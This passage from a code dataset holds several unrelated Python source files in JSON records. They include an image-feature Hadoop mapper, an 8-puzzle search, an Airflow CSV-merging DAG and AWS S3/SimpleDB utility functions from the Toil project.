ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixQ2JlMNfqnGb2qqWZtmZLchh1TSjRS0zuchuhlR8g4tlMGrjg34sNmyjQ","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"74560548","text":"import hadoopy\nimport imfeat\nimport impoint\nimport os\nimport numpy as np\nimport picarus._features as features\n\n\ndef _parse_height_width():\n try:\n image_width = image_height = int(os.environ['IMAGE_LENGTH'])\n except KeyError:\n image_width = int(os.environ['IMAGE_WIDTH'])\n image_height = int(os.environ['IMAGE_HEIGHT'])\n return image_height, image_width\n\n\nclass Mapper(object):\n\n def __init__(self):\n self._feat = features.select_feature_point(os.environ['FEATURE'])\n self._image_height, self._image_width = _parse_height_width()\n\n def map(self, name, image_data):\n try:\n image = imfeat.image_fromstring(image_data)\n except:\n hadoopy.counter('DATA_ERRORS', 'ImageLoadError')\n return\n try:\n image = imfeat.resize_image(image, self._image_height, self._image_width)\n except:\n hadoopy.counter('DATA_ERRORS', 'ImageLoadError')\n try:\n for x in self._feat(image):\n yield name, x\n except:\n hadoopy.counter('DATA_ERRORS', 'UnkImageType')\n return\n\n\nif __name__ == '__main__':\n hadoopy.run(Mapper)\n","sub_path":"picarus/vision/feature_point_compute.py","file_name":"feature_point_compute.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61877363","text":"\n#Implement strStr(). Returns the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\nclass Solution(object):\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n n, m = len(haystack), len(needle)\n if m > n:\n return -1\n elif m == 0:\n return 0\n for i in range(n - m + 1):\n tag = True\n j = i\n for s in needle:\n if haystack[j] != s:\n tag = False\n break\n j += 1\n if tag:\n return i\n return -1\n","sub_path":"py/028 Implement strStr/ImplementstrStr.py","file_name":"ImplementstrStr.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194654470","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom random import randrange\nclass State:\n def __init__(self, state, directionFlag=None, parent=None):\n self.state = state \n self.direction = ['up', 'down', 'right', 'left']\n if directionFlag:\n self.direction.remove(directionFlag) \n self.parent = parent\n self.symbol = ' '\n\n def GetEmptyPos(self):\n postion = np.where(self.state == self.symbol)\n return postion\n \n def GetDirection(self):\n return self.direction\n \n def GetPath(self): #返回含有目标的搜索路径\n path = []\n path.append(self)\n while self.parent and self.parent != originState: #记录含有目标的路径\n path.append(self.parent)\n self = self.parent\n path.reverse()\n return path\n \n def SeekTarget(self): \n OPEN = [] \n CLOSED = [] \n OPEN.append(self) \n steps = 1 \n nodeNumber = 0;\n while len(OPEN) > 0: \n n = OPEN.pop(0)\n CLOSED.append(n)\n childStates = n.Expand() #\n nodeNumber += len(childStates)\n for s in childStates:\n if (s.state == s.answer).all(): #判断是否所有的元素都是匹配的\n return s.GetPath(),steps+1,nodeNumber\n childStates.extend(OPEN)\n OPEN = childStates.copy()\n steps += 1\n else:\n return None\n\n\n def Expand(self): #扩展当前结点\n if not self.direction:\n return []\n childStates = []\n boarder = len(self.state) - 1 \n \n row, col = self.GetEmptyPos()\n if 'up' in self.direction and row > 0: #判断是否可以向上移动 \n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row-1, col]\n s[row-1, col] = temp[row, col]\n news = State(s, directionFlag='down', parent=self)\n childStates.append(news)\n \n if 'down' in self.direction and row < boarder: #是否可以向下移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row+1, col]\n s[row+1, col] = temp[row, col]\n news = State(s, directionFlag='up', parent=self)\n childStates.append(news)\n \n if 'left' in self.direction and col > 0:#是否可以向左移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row, col-1]\n s[row, col-1] = temp[row, col]\n news = State(s, directionFlag='right', parent=self)\n childStates.append(news)\n \n if self.direction.count('right') and col < boarder: #是否可以向右移动\n s = self.state.copy()\n temp = s.copy()\n s[row, col] = s[row, col+1]\n s[row, col+1] = temp[row, col]\n news = State(s, directionFlag='left', parent=self)\n childStates.append(news)\n return childStates\n\n \ndef GenerateMatrixAuto(): #自动生成矩阵\n# NewState = np.array([[2, ' ' , 3], [1, 8 , 4], [7, 6, 5]]).copy()\n NewState = np.array([[1, ' ' , 5], [2, 8 , 4], [7, 6, 3]]).copy()\n# print(NewState)\n# return NewState\n emptyPosX = 0;\n emptyPosY = 1;\n X = Y = 0;\n while(1):\n X = randrange(0,3)\n Y = randrange(0,3)\n if(NewState[X][Y] != NewState[emptyPosX][emptyPosY]):\n temp = NewState[X,Y]\n NewState[X,Y] = NewState[emptyPosX,emptyPosY]\n NewState[emptyPosX,emptyPosY] = temp\n break\n print(NewState)\n return NewState\n \ndef GenerateMatrixHand(): #手动输入矩阵\n NewState = np.array([[2, ' ' , 3], [1, 8 , 4], [7, 6, 5]]).copy()\n str = input(\"请依次输入矩阵元素,0代表空格: \")\n inputMatrix = []\n inputMatrix = str.split(\",\")\n emptyPos = inputMatrix.index('0')\n count = 0\n while(count < 9):\n if(count != emptyPos):\n NewState[count // 3,count % 3] = int(inputMatrix[count])\n else:\n NewState[count // 3,count % 3] = ' '\n count = count + 1\n print(NewState)\n return NewState\n\nif __name__ == '__main__':\n while(1):\n choic =eval(input(\"输入1选择自动生成初始状态|输入2手动输入初始状态|输入3选择默认初始状态: \"))\n if choic != 1 and choic != 2 and choic != 3:\n print(\"输入有误!\",\"\\n\")\n else:\n break\n print(\"生成的初始状态为: \")\n if(choic == 1):\n originState = State(GenerateMatrixAuto())\n elif(choic == 2):\n originState = State(GenerateMatrixHand())\n else:\n # newState = np.array([[2, ' ' , 3], [1, 5 , 4], [7, 6, 8]]).copy()\n newState = np.array([[2, ' ' , 5], [1, 3 , 4], [7, 6, 8]]).copy()\n originState = State(newState)\n print(newState)\n \n State.answer = np.array([[1, 2, 3], [8, ' ', 4], [7, 6, 5]]) \n s = State(state=originState.state)\n path, steps ,nodeNumber= s.SeekTarget()\n if path: #打印含目标结点的路径\n print(\"从起始状态到目标结点的路径为: \")\n for node in path: \n print(node.state)\n print(\" |\")\n print(\" v\")\n print(\"扩展结点数为:%d\" %steps)\n print(\"生成结点数为:%d\" %nodeNumber)\n else:\n print(\"目标结点不可到达\")","sub_path":"源程序/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"644357273","text":"from .dataService import DataService\nfrom utils.stats import box_plots, date_bins, date_histograms, counts\n\n\nclass ComparisonService(object):\n def __init__(self, config=None):\n self.dataAccess = DataService()\n\n def frequency_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items, bins, start, end):\n common = {\n 'startDate': start,\n 'endDate': end,\n 'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n groupField = 'nc'\n elif district == 'cc':\n common['cdList'] = items\n groupField = 'cd'\n\n fields = [groupField, 'createddate']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return date_histograms(\n df,\n dateField='createddate',\n bins=bins,\n groupField=groupField,\n groupFieldItems=items)\n\n bins, start, end = date_bins(startDate, endDate)\n set1data = get_data(set1['district'], set1['list'], bins, start, end)\n set2data = get_data(set2['district'], set2['list'], bins, start, end)\n\n return {\n 'bins': list(bins.astype(str)),\n 'set1': {\n 'district': set1['district'],\n 'counts': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'counts': set2data\n }\n }\n\n def ttc_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items):\n common = {\n 'startDate': startDate,\n 'endDate': endDate,\n 'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n groupField = 'nc'\n elif district == 'cc':\n common['cdList'] = items\n groupField = 'cd'\n\n fields = [groupField, '_daystoclose']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return box_plots(\n df,\n plotField='_daystoclose',\n groupField=groupField,\n groupFieldItems=items)\n\n set1data = get_data(set1['district'], set1['list'])\n set2data = get_data(set2['district'], set2['list'])\n\n return {\n 'set1': {\n 'district': set1['district'],\n 'data': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'data': set2data\n }\n }\n\n def counts_comparison(self,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n def get_data(district, items):\n common = {\n 'startDate': startDate,\n 'endDate': endDate,\n 'requestTypes': requestTypes\n }\n\n if district == 'nc':\n common['ncList'] = items\n elif district == 'cc':\n common['cdList'] = items\n\n fields = ['requestsource']\n filters = self.dataAccess.comparisonFilters(**common)\n df = self.dataAccess.query(fields, filters, table='vis')\n\n return counts(df, 'requestsource')\n\n set1data = get_data(set1['district'], set1['list'])\n set2data = get_data(set2['district'], set2['list'])\n\n return {\n 'set1': {\n 'district': set1['district'],\n 'source': set1data\n },\n 'set2': {\n 'district': set2['district'],\n 'source': set2data\n }\n }\n\n async def comparison(self,\n type=None,\n startDate=None,\n endDate=None,\n requestTypes=[],\n set1={'district': None, 'list': []},\n set2={'district': None, 'list': []}):\n\n args = {\n 'startDate': startDate,\n 'endDate': endDate,\n 'requestTypes': requestTypes,\n 'set1': set1,\n 'set2': set2}\n\n if type == 'frequency':\n return self.frequency_comparison(**args)\n elif type == 'timetoclose':\n return self.ttc_comparison(**args)\n elif type == 'counts':\n return self.counts_comparison(**args)\n else:\n return {'Error': 'Unrecognized comparison type'}\n","sub_path":"server/src/services/comparisonService.py","file_name":"comparisonService.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"242103837","text":"import csv\nimport os\nimport re\nimport datetime as dt \nfrom datetime import datetime, timezone\nfrom os.path import exists\nfrom datetime import timedelta\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom typing import Iterator, Dict, Optional, List\n\n\ndef preprocessing(path: str, run_log_file: str) -> Optional[List]:\n\t\"\"\"\n\tArgument: a string representing the path where CSV files to process are located.\n\tReturns: a numeric value signaling whether processing is needed or not.\n\n\tThis function will consult a log containing a timestamp for the last time that CSV files were processed.\n\tIf any files were dropped into the dir AFTER the last time the process ran, then only those files will be processed\n\tand the Combined.csv file will be updated.\n\tIf the log file does not exist, this function will create and initialize it.\n\t\"\"\"\n\tf_name = path + '/' + run_log_file\n\tts = datetime.now().timestamp()\n\tif not exists(f_name):\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['last_run'])\n\t\t\twriter.writerow([ts])\n\t\treturn files_to_process(path, 0.0)\n\telse:\n\t\twith open(f_name, 'r') as f: \n\t\t\ttimes = f.readlines() \n\t\tlastRun = times[-1]\n\t\tlastRun = float(lastRun.split(',')[0])\n\t\twith open(f_name, 'a+') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow([ts])\n\t\treturn files_to_process(path, lastRun)\n\n\ndef files_to_process(path: str, last_run: float) -> Optional[List]:\n\t\"\"\"\n\tArgument: a string representing the path where CSV files to process are located.\n\t\t\t a float representing the timestamp of the last time the process was run.\n\tReturns: a list of CSV files found in the directory pointed to by the path string.\n\t\"\"\"\n\tif len(path) == 0:\n\t\treturn None\n\t\n\tfiles = [path + '/' + f for f in os.listdir(path) if '.csv' in f]\n\n\tif last_run != 0.0:\n\t\tfiles = [file for file in files if os.path.getmtime(file) > last_run]\n\n\treturn files\n\n\ndef read_from_csv(files: list) -> Dict:\n\t\"\"\"\n\tArgument: a list containing the path to a CSV file\n\tReturns: one row at a time as a dictionary\n\t\"\"\"\n\tcombined_dict = {}\n\t# The regex pattern will match any filename starting with path to file, followed by two words separated by space (it will capture this substring),\n\t# followed by space and zero or more digits and terminated by '.csv' extension.\n\t# Example: '/develop/data/Asia Prod 3.csv' \n\tcsv_file_pattern = r'[\\.\\w\\/\\s]*\\/([A-Za-z]+\\s[A-Za-z]+)\\s*\\d*\\.csv'\n\tfor file in files:\n\t\tp = re.compile(csv_file_pattern)\n\t\tm = p.match(file)\n\t\tenv = ''\n\t\tif m == None:\n\t\t\tprint('Skipping {} since it does not match CSV file pattern.'.format(file))\n\t\t\tcontinue\n\t\telse:\n\t\t\tenv = m.group(1)\n\n\t\twith open(file, 'r') as f:\n\t\t\t### Add some clarification here for accounting for inconsistent header names\n\t\t\tcolumns = ['source_ip', 'count', 'events_per_second']\n\t\t\treader = csv.DictReader(f, fieldnames=columns, delimiter=',')\n\t\t\tnext(reader)\n\t\t\tfor row in reader:\n\t\t\t\tif row['source_ip'] not in combined_dict.keys():\n\t\t\t\t\tcombined_dict[row['source_ip']] = env\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\treturn combined_dict\n\n\ndef sort_values(c_dict: dict) -> List:\n\t\"\"\"\n\tArguments: a dictionary containing ip addresses as keys and corresponding environment as values\n\tReturns: a list of tuples ordered by ip address value \n\t\"\"\"\n\tvalue_pairs = [(ip, c_dict[ip]) for ip in c_dict.keys()]\n\t# Sort based on the numeric value of the first integer in IP address\n\tvalue_pairs.sort(key=lambda x: int(x[0].split('.')[0]))\n\treturn value_pairs\n\n\ndef write_to_csv(val_list: list, f_name: str) -> int:\n\t\"\"\"\n\tArgument: a list of tuples that will be used to write to csv file\n\tReturns: integer signaling exit status:\n\t\t\t\t0: Successfully created and wrote to Combined.txt\n\t\t\t\t1: Nothing to process\n\t\t\t\t2: Successfully updated Combined.txt\n\n\tThis function will attempt to write the contents of val_list into CSV file f_name.\n\tIf f_name does not already exist at the time the function is called, this function will create the file and then write to it.\n\tOtherwise, the function will merge any new information contained in val_list with the information already contained in f_name, giving\n\tpriority to the new information found in val_list. \n\t\"\"\"\n\tif len(val_list) == 0:\n\t\treturn 1 \n\n\tif not exists(f_name):\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['Source Ip', 'Environment'])\n\t\t\tfor row in val_list:\n\t\t\t\twriter.writerow(row)\n\t\treturn 0\n\telse:\n\t\tcombined_dict = {}\n\t\tfor pair in val_list:\n\t\t\tif pair[0] not in combined_dict:\n\t\t\t\tcombined_dict[pair[0]] = pair[1]\n\n\t\twith open(f_name, 'r') as f:\n\t\t\treader = csv.DictReader(f)\n\t\t\t#Merge values with those already on the file. Note that new values will take precedence over those already on file. Thus updating the contents.\n\t\t\tfor row in reader:\n\t\t\t\tif row['Source Ip'] not in combined_dict:\n\t\t\t\t\tcombined_dict[row['Source Ip']] = row['Environment']\n\n\t\tupdated_val_list = sort_values(combined_dict)\n\n\t\twith open(f_name, 'w') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow(['Source Ip', 'Environment'])\n\t\t\tfor row in updated_val_list:\n\t\t\t\twriter.writerow(row)\n\n\t\treturn 2\n\n\ndef combine_to_single_csv():\n\tdata_path = '../data'\n\tout_file = data_path + '/Combined.csv'\n\tcsv_files = preprocessing(path=data_path, run_log_file='process_time_log.csv')\n\tcombined_dict = read_from_csv(csv_files)\n\tvalue_pairs = sort_values(c_dict=combined_dict)\n\texit_status = write_to_csv(value_pairs, out_file)\n\n\tif exit_status == 0:\n\t\tprint('File {} was successuflly created.'.format(out_file))\n\telif exit_status == 1:\n\t\tprint('No files to process.')\n\telif exit_status == 2:\n\t\tprint('File {} was updated with new CSV information.'.format(out_file))\n\n\ndefault_args = { 'owner': 'cbeas', \n\t\t\t\t 'start_date': dt.datetime(2021, 10, 30), \n\t\t\t\t 'retries': 1, \n\t\t\t\t 'retry_delay': dt.timedelta(minutes=5),\n\t\t\t\t}\n\nwith DAG('CombineToCsv', \n\t\t default_args=default_args,\n\t\t schedule_interval=timedelta(days=1)\n\t) as dag:\n\n\tstart_this = BashOperator(task_id='starting', \n\t\t\t\t\t\t\t\t bash_command='echo \"Combine to single CSV process has started.\"',\n\t\t\t\t\t\t\t\t )\n\n\ttask = PythonOperator(task_id='CombineToSingleCSV', python_callable=combine_to_single_csv)\n\n\tcomplete = BashOperator(task_id='completing', \n\t\t\t\t\t\t\t\t bash_command='echo \"Combine to single CSV process has completed.\"',\n\t\t\t\t\t\t\t\t )\n\n\tstart_this >> task >> complete\n\n","sub_path":"dag/CombineToCsv.py","file_name":"CombineToCsv.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"604620885","text":"import time\n\nfrom engine import settings\nfrom engine.modules.worlds.matchmaking import handle_matchmaking\nfrom game.instance import worlds\nfrom game.services.startgame import create_world\n\n\nclass QueueThread:\n def __init__(self, server):\n self.server = server\n\n self.enabled = settings.get('worlds.search_enabled')\n\n def run(self):\n # this thread tries to match players into queues\n if not self.enabled:\n return\n\n starting_parties = handle_matchmaking()\n\n for i, party in enumerate(starting_parties):\n world, l_countries = create_world()\n worlds.save(world)\n\n # send invitation to each client, but they have to accept it themselves\n for client_id in party['uids']:\n self.server.send(client_id, {\n \"route\": \"Parties:invite\",\n \"wid\": world.wid,\n })\n\n if i % 30 == 0:\n # take a 200ms break\n time.sleep(0.2)\n\n\n # 600 ms sleep\n time.sleep(0.6)\n","sub_path":"serverapp/threads/QueueThread.py","file_name":"QueueThread.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307868822","text":"# -*- coding: utf-8 -*-\r\n# 2020/5/8\r\n# create by: snower\r\n\r\nimport greenlet\r\n\r\n\r\ndef warp_coroutine(BaseDNSResolver):\r\n class DNSResolver(BaseDNSResolver):\r\n async def gethostbyname(self, hostname, timeout=None):\r\n child_gr = greenlet.getcurrent()\r\n main = child_gr.parent\r\n assert main is not None, \"must be running in async func\"\r\n self.resolve(hostname, lambda hostname, ip: child_gr.switch(ip), timeout)\r\n return main.switch()\r\n\r\n return DNSResolver\r\n","sub_path":"sevent/coroutines/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"135719564","text":"# Copyright (C) 2015-2016 Regents of the University of California\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nimport base64\nimport bz2\nimport os\nimport socket\nimport logging\nimport types\n\nimport errno\nfrom contextlib import closing\nfrom ssl import SSLError\nfrom multiprocessing import cpu_count\n\n# Python 3 compatibility imports\nimport itertools\n\n\nimport boto\nfrom bd2k.util.exceptions import panic\nfrom concurrent.futures import ThreadPoolExecutor\nfrom six import iteritems\n\nfrom bd2k.util.retry import retry\nfrom boto.exception import (SDBResponseError,\n BotoServerError,\n S3ResponseError,\n S3CreateError,\n S3CopyError)\n\nlog = logging.getLogger(__name__)\n\n\nclass SDBHelper(object):\n \"\"\"\n A mixin with methods for storing limited amounts of binary data in an SDB item\n\n >>> import os\n >>> H=SDBHelper\n >>> H.presenceIndicator()\n '000'\n >>> H.binaryToAttributes(None)\n {}\n >>> H.attributesToBinary({})\n (None, 0)\n >>> H.binaryToAttributes('')\n {'000': 'VQ=='}\n >>> H.attributesToBinary({'000': 'VQ=='})\n ('', 1)\n\n Good pseudo-random data is very likely smaller than its bzip2ed form. Subtract 1 for the type\n character, i.e 'C' or 'U', with which the string is prefixed. We should get one full chunk:\n\n >>> s = os.urandom(H.maxRawValueSize-1)\n >>> d = H.binaryToAttributes(s)\n >>> len(d), len(d['000'])\n (1, 1024)\n >>> H.attributesToBinary(d) == (s, 1)\n True\n\n One byte more and we should overflow four bytes into the second chunk, two bytes for\n base64-encoding the additional character and two bytes for base64-padding to the next quartet.\n\n >>> s += s[0]\n >>> d = H.binaryToAttributes(s)\n >>> len(d), len(d['000']), len(d['001'])\n (2, 1024, 4)\n >>> H.attributesToBinary(d) == (s, 2)\n True\n\n \"\"\"\n # The SDB documentation is not clear as to whether the attribute value size limit of 1024\n # applies to the base64-encoded value or the raw value. It suggests that responses are\n # automatically encoded from which I conclude that the limit should apply to the raw,\n # unencoded value. However, there seems to be a discrepancy between how Boto computes the\n # request signature if a value contains a binary data, and how SDB does it. This causes\n # requests to fail signature verification, resulting in a 403. We therefore have to\n # base64-encode values ourselves even if that means we loose a quarter of capacity.\n\n maxAttributesPerItem = 256\n maxValueSize = 1024\n maxRawValueSize = maxValueSize * 3 / 4\n # Just make sure we don't have a problem with padding or integer truncation:\n assert len(base64.b64encode(' ' * maxRawValueSize)) == 1024\n assert len(base64.b64encode(' ' * (1 + maxRawValueSize))) > 1024\n\n @classmethod\n def _reservedAttributes(cls):\n \"\"\"\n Override in subclass to reserve a certain number of attributes that can't be used for\n chunks.\n \"\"\"\n return 0\n\n @classmethod\n def _maxChunks(cls):\n return cls.maxAttributesPerItem - cls._reservedAttributes()\n\n @classmethod\n def maxBinarySize(cls):\n return cls._maxChunks() * cls.maxRawValueSize - 1 # for the 'C' or 'U' prefix\n\n @classmethod\n def _maxEncodedSize(cls):\n return cls._maxChunks() * cls.maxValueSize\n\n @classmethod\n def binaryToAttributes(cls, binary):\n if binary is None: return {}\n assert len(binary) <= cls.maxBinarySize()\n # The use of compression is just an optimization. We can't include it in the maxValueSize\n # computation because the compression ratio depends on the input.\n compressed = bz2.compress(binary)\n if len(compressed) > len(binary):\n compressed = 'U' + binary\n else:\n compressed = 'C' + compressed\n encoded = base64.b64encode(compressed)\n assert len(encoded) <= cls._maxEncodedSize()\n n = cls.maxValueSize\n chunks = (encoded[i:i + n] for i in range(0, len(encoded), n))\n return {cls._chunkName(i): chunk for i, chunk in enumerate(chunks)}\n\n @classmethod\n def _chunkName(cls, i):\n return str(i).zfill(3)\n\n @classmethod\n def _isValidChunkName(cls, s):\n return len(s) == 3 and s.isdigit()\n\n @classmethod\n def presenceIndicator(cls):\n \"\"\"\n The key that is guaranteed to be present in the return value of binaryToAttributes().\n Assuming that binaryToAttributes() is used with SDB's PutAttributes, the return value of\n this method could be used to detect the presence/absence of an item in SDB.\n \"\"\"\n return cls._chunkName(0)\n\n @classmethod\n def attributesToBinary(cls, attributes):\n \"\"\"\n :rtype: (str|None,int)\n :return: the binary data and the number of chunks it was composed from\n \"\"\"\n chunks = [(int(k), v) for k, v in iteritems(attributes) if cls._isValidChunkName(k)]\n chunks.sort()\n numChunks = len(chunks)\n if numChunks:\n assert len(set(k for k, v in chunks)) == chunks[-1][0] + 1 == numChunks\n serializedJob = ''.join(v for k, v in chunks)\n compressed = base64.b64decode(serializedJob)\n if compressed[0] == 'C':\n binary = bz2.decompress(compressed[1:])\n elif compressed[0] == 'U':\n binary = compressed[1:]\n else:\n assert False\n else:\n binary = None\n return binary, numChunks\n\n\nfrom boto.sdb.connection import SDBConnection\n\n\ndef fileSizeAndTime(localFilePath):\n file_stat = os.stat(localFilePath)\n file_size, file_time = file_stat.st_size, file_stat.st_mtime\n return file_size, file_time\n\n\ndef uploadFromPath(localFilePath, partSize, bucket, fileID, headers):\n \"\"\"\n Uploads a file to s3, using multipart uploading if applicable\n\n :param str localFilePath: Path of the file to upload to s3\n :param int partSize: max size of each part in the multipart upload, in bytes\n :param boto.s3.Bucket bucket: the s3 bucket to upload to\n :param str fileID: the name of the file to upload to\n :param headers: http headers to use when uploading - generally used for encryption purposes\n :return: version of the newly uploaded file\n \"\"\"\n file_size, file_time = fileSizeAndTime(localFilePath)\n if file_size <= partSize:\n key = bucket.new_key(key_name=fileID)\n key.name = fileID\n for attempt in retry_s3():\n with attempt:\n key.set_contents_from_filename(localFilePath, headers=headers)\n version = key.version_id\n else:\n with open(localFilePath, 'rb') as f:\n version = chunkedFileUpload(f, bucket, fileID, file_size, headers, partSize)\n for attempt in retry_s3():\n with attempt:\n key = bucket.get_key(fileID,\n headers=headers,\n version_id=version)\n assert key.size == file_size\n # Make reasonably sure that the file wasn't touched during the upload\n assert fileSizeAndTime(localFilePath) == (file_size, file_time)\n return version\n\n\ndef chunkedFileUpload(readable, bucket, fileID, file_size, headers=None, partSize=50 << 20):\n for attempt in retry_s3():\n with attempt:\n upload = bucket.initiate_multipart_upload(\n key_name=fileID,\n headers=headers)\n try:\n start = 0\n part_num = itertools.count()\n while start < file_size:\n end = min(start + partSize, file_size)\n assert readable.tell() == start\n for attempt in retry_s3():\n with attempt:\n upload.upload_part_from_file(fp=readable,\n part_num=next(part_num) + 1,\n size=end - start,\n headers=headers)\n start = end\n assert readable.tell() == file_size == start\n except:\n with panic(log=log):\n for attempt in retry_s3():\n with attempt:\n upload.cancel_upload()\n else:\n for attempt in retry_s3():\n with attempt:\n version = upload.complete_upload().version_id\n return version\n\n\ndef copyKeyMultipart(srcKey, dstBucketName, dstKeyName, partSize, headers=None):\n \"\"\"\n Copies a key from a source key to a destination key in multiple parts. Note that if the\n destination key exists it will be overwritten implicitly, and if it does not exist a new\n key will be created. If the destination bucket does not exist an error will be raised.\n\n :param boto.s3.key.Key srcKey: The source key to be copied from.\n :param str dstBucketName: The name of the destination bucket for the copy.\n :param str dstKeyName: The name of the destination key that will be created or overwritten.\n :param int partSize: The size of each individual part, must be >= 5 MiB but large enough to\n not exceed 10k parts for the whole file\n :param dict headers: Any headers that should be passed.\n\n :rtype: boto.s3.multipart.CompletedMultiPartUpload\n :return: An object representing the completed upload.\n \"\"\"\n\n def copyPart(partIndex):\n if exceptions:\n return None\n try:\n for attempt in retry_s3():\n with attempt:\n start = partIndex * partSize\n end = min(start + partSize, totalSize)\n part = upload.copy_part_from_key(src_bucket_name=srcKey.bucket.name,\n src_key_name=srcKey.name,\n src_version_id=srcKey.version_id,\n # S3 part numbers are 1-based\n part_num=partIndex + 1,\n # S3 range intervals are closed at the end\n start=start, end=end - 1,\n headers=headers)\n except Exception as e:\n if len(exceptions) < 5:\n exceptions.append(e)\n log.error('Failed to copy part number %d:', partIndex, exc_info=True)\n else:\n log.warn('Also failed to copy part number %d due to %s.', partIndex, e)\n return None\n else:\n log.debug('Successfully copied part %d of %d.', partIndex, totalParts)\n # noinspection PyUnboundLocalVariable\n return part\n\n totalSize = srcKey.size\n totalParts = (totalSize + partSize - 1) / partSize\n exceptions = []\n # We need a location-agnostic connection to S3 so we can't use the one that we\n # normally use for interacting with the job store bucket.\n with closing(boto.connect_s3()) as s3:\n for attempt in retry_s3():\n with attempt:\n dstBucket = s3.get_bucket(dstBucketName)\n upload = dstBucket.initiate_multipart_upload(dstKeyName, headers=headers)\n log.info(\"Initiated multipart copy from 's3://%s/%s' to 's3://%s/%s'.\",\n srcKey.bucket.name, srcKey.name, dstBucketName, dstKeyName)\n try:\n # We can oversubscribe cores by at least a factor of 16 since each copy task just\n # blocks, waiting on the server. Limit # of threads to 128, since threads aren't\n # exactly free either. Lastly, we don't need more threads than we have parts.\n with ThreadPoolExecutor(max_workers=min(cpu_count() * 16, totalParts, 128)) as executor:\n parts = list(executor.map(copyPart, xrange(0, totalParts)))\n if exceptions:\n raise RuntimeError('Failed to copy at least %d part(s)' % len(exceptions))\n assert len(filter(None, parts)) == totalParts\n except:\n with panic(log=log):\n upload.cancel_upload()\n else:\n for attempt in retry_s3():\n with attempt:\n completed = upload.complete_upload()\n log.info(\"Completed copy from 's3://%s/%s' to 's3://%s/%s'.\",\n srcKey.bucket.name, srcKey.name, dstBucketName, dstKeyName)\n return completed\n\n\ndef _put_attributes_using_post(self, domain_or_name, item_name, attributes,\n replace=True, expected_value=None):\n \"\"\"\n Monkey-patched version of SDBConnection.put_attributes that uses POST instead of GET\n\n The GET version is subject to the URL length limit which kicks in before the 256 x 1024 limit\n for attribute values. Using POST prevents that.\n\n https://github.com/BD2KGenomics/toil/issues/502\n \"\"\"\n domain, domain_name = self.get_domain_and_name(domain_or_name)\n params = {'DomainName': domain_name,\n 'ItemName': item_name}\n self._build_name_value_list(params, attributes, replace)\n if expected_value:\n self._build_expected_value(params, expected_value)\n # The addition of the verb keyword argument is the only difference to put_attributes (Hannes)\n return self.get_status('PutAttributes', params, verb='POST')\n\n\ndef monkeyPatchSdbConnection(sdb):\n \"\"\"\n :type sdb: SDBConnection\n \"\"\"\n sdb.put_attributes = types.MethodType(_put_attributes_using_post, sdb)\n\n\ndefault_delays = (0, 1, 1, 4, 16, 64)\ndefault_timeout = 300\n\n\ndef connection_reset(e):\n # For some reason we get 'error: [Errno 104] Connection reset by peer' where the\n # English description suggests that errno is 54 (ECONNRESET) while the actual\n # errno is listed as 104. To be safe, we check for both:\n return isinstance(e, socket.error) and e.errno in (errno.ECONNRESET, 104)\n\n\ndef sdb_unavailable(e):\n return isinstance(e, BotoServerError) and e.status == 503\n\n\ndef no_such_sdb_domain(e):\n return (isinstance(e, SDBResponseError)\n and e.error_code\n and e.error_code.endswith('NoSuchDomain'))\n\n\ndef retryable_ssl_error(e):\n # 